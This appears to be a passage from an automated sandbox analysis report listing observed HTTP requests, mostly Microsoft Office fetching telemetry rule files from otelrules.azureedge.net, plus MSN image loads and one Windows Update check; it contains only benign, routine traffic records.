Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zwDyvpazmB6cKF9&MD=Lc9CB+c+ HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
